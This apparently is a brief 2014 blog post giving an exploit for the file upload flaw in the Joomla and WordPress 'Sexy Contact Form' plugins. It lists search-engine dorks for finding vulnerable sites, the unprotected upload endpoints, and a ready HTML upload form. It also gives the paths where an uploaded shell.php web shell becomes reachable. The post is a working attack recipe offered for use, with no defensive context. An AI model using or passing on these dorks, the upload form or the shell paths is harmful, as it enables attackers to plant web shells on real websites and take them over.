21 Kasım 2014 Cuma

Joomla com_sexycontact Exploit Vulnerability Wordpress com_sexycontact
 
Dorks : 
1-"inurl:/components/com_sexycontactform/ "
2-"Powered by sexycontact"
3- "inurl:"sexy-contact-form"
Exp: components/com_sexycontactform/fileupload/index.php
Shell : example.com/components/com_sexycontactform/fileupload/files/shell.php
HTML Upload Source:
<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
com_sexycontactform-fileupload
 
com_sexycontactform-fileuploadshell
com_sexycontactform-fileupload-ethicalhtml
com_sexycontactform-fileupload-dosyasec com_sexycontactform-fileupload-zawphp
 
Wordpress com_sexycontact Vuln
Dork : wp-content/plugins/sexy-contact-form/
Exp : wp-content/plugins/sexy-contact-form/includes/fileupload/index.php
Shell : wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php